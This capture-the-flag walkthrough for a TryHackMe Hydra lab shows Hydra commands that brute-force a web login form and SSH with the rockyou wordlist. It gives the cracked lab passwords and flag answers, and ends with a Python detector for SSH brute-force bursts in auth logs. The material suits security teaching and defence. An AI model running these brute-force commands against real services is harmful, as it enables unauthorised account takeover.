Hydra (TryHackMe Walkthrough)
What is Hydra?
Hydra comes pre-installed on Kali Linux. It is used to brute-force online passwords: we can use Hydra to run through a list and brute-force some authentication service.
Hydra has the ability to brute-force the following protocols: Asterisk, AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP, HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP-POST, HTTP-PROXY, HTTPS-FORM-GET, HTTPS-FORM-POST, HTTPS-GET, HTTPS-HEAD, HTTPS-POST, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MYSQL, NCP, NNTP, Oracle Listener, Oracle SID, Oracle, PC-Anywhere, PCNFS, POP3, POSTGRES, RDP, Rexec, Rlogin, Rsh, RTSP, SAP/R3, SIP, SMB, SMTP, SMTP Enum, SNMP v1+v2+v3, SOCKS5, SSH (v1 and v2), SSHKEY, Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP.
Hydra Commands
The options we pass to Hydra depend on which service (protocol) we're attacking. For example, if we wanted to brute-force FTP with the username being user and the password list being passlist.txt, we'd use the following command:
hydra -l user -P passlist.txt ftp://<machine-ip>
For the purpose of this deployed machine, here are the commands to use Hydra on SSH and a web form (POST method).
SSH
hydra -l <username> -P <full path to password list> <machine-ip> -t 4 ssh
Post Web Form
We can use Hydra to brute-force web forms too. You will have to make sure you know which type of request it is making; GET or POST methods are normally used. You can use your browser's network tab (in developer tools) to see the request types, or simply view the source code. Below is an example Hydra command to brute-force a POST login form:
hydra -l <username> -P <wordlist> <machine-ip> http-post-form "/:username=^USER^&password=^PASS^:F=incorrect" -V
Use Hydra to brute force molly’s web password. What is flag 1?
In the terminal, run:
hydra -l molly -P /usr/share/wordlists/rockyou.txt <machine-ip> http-post-form "/login:username=^USER^&password=^PASS^:incorrect"
Hydra works through the passwords in rockyou.txt and reports the correct one, which in our case is:
[80][http-post-form] host: Machine’s IP login: molly password: sunshine
Use this password to log in to the web page served at the machine's IP.
Username: molly
Password: sunshine
After logging in, the flag is displayed: THM{2673a7dd116de68e85c48ec0b1f2612e}
Use Hydra to bruteforce molly’s SSH password. What is flag 2?
Here you need to brute-force the SSH password. Try it with the following command:
hydra -l molly -P /usr/share/wordlists/rockyou.txt ssh://<machine-ip>
Hydra again reports a valid password, in highlighted text:
Username: molly
Password: butterfly
Think for a moment and you will see that the flag must be on the machine itself, so you must log in via SSH:
ssh molly@<machine-ip>
Type "Yes" if it asks whether you want to continue.
Enter the password, i.e. butterfly
Once you are logged in, run:
ls
There is a file named flag2.txt.
Now cat the file:
cat flag2.txt
Ans: THM{c8eeb0468febbadea859baeb33b2541b}
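Seen from the target's side, the SSH brute force above leaves a burst of "Failed password" lines from one source in the sshd auth log, ending in one "Accepted password" line. The following is an added example, not part of the original walkthrough, that flags this pattern; the log lines, IP addresses, threshold, window and year are constructed assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sshd auth.log lines (documentation IPs): a burst of failures from
# one source ending in a success, plus one unrelated mistyped password.
SAMPLE_LOG = """\
Mar  3 10:15:01 target sshd[2101]: Failed password for molly from 203.0.113.50 port 40112 ssh2
Mar  3 10:15:01 target sshd[2102]: Failed password for molly from 203.0.113.50 port 40114 ssh2
Mar  3 10:15:02 target sshd[2103]: Failed password for molly from 203.0.113.50 port 40116 ssh2
Mar  3 10:15:02 target sshd[2104]: Failed password for molly from 203.0.113.50 port 40118 ssh2
Mar  3 10:15:04 target sshd[2105]: Failed password for molly from 203.0.113.50 port 40120 ssh2
Mar  3 10:15:05 target sshd[2106]: Failed password for molly from 203.0.113.50 port 40122 ssh2
Mar  3 10:15:07 target sshd[2107]: Accepted password for molly from 203.0.113.50 port 40124 ssh2
Mar  3 11:02:10 target sshd[2290]: Failed password for molly from 198.51.100.9 port 51000 ssh2
Mar  3 11:02:20 target sshd[2291]: Accepted password for molly from 198.51.100.9 port 51002 ssh2
"""

LINE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ [\d:]{8}) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\S+) port \d+")

def detect_bruteforce(log_text, threshold=5, window=timedelta(seconds=60), year=2024):
    """Return {ip: {"failures": n, "compromised": [users]}} for every source
    with at least `threshold` failed logins inside a sliding time window."""
    recent = defaultdict(deque)   # ip -> timestamps of failures still in window
    alerts = {}
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue
        # syslog timestamps carry no year, so the year is an assumption
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        ip, q = m["ip"], recent[m["ip"]]
        while q and ts - q[0] > window:
            q.popleft()               # drop failures older than the window
        if m["result"] == "Failed":
            q.append(ts)
            if len(q) >= threshold:
                alert = alerts.setdefault(ip, {"failures": 0, "compromised": []})
                alert["failures"] = max(alert["failures"], len(q))
        elif ip in alerts and q:
            # success right after a burst from the same source: password guessed
            alerts[ip]["compromised"].append(m["user"])
    return alerts
```

A source that appears with a non-empty "compromised" list means the account's password was guessed and should be rotated; the single mistyped password from the second address stays below the threshold and is not flagged.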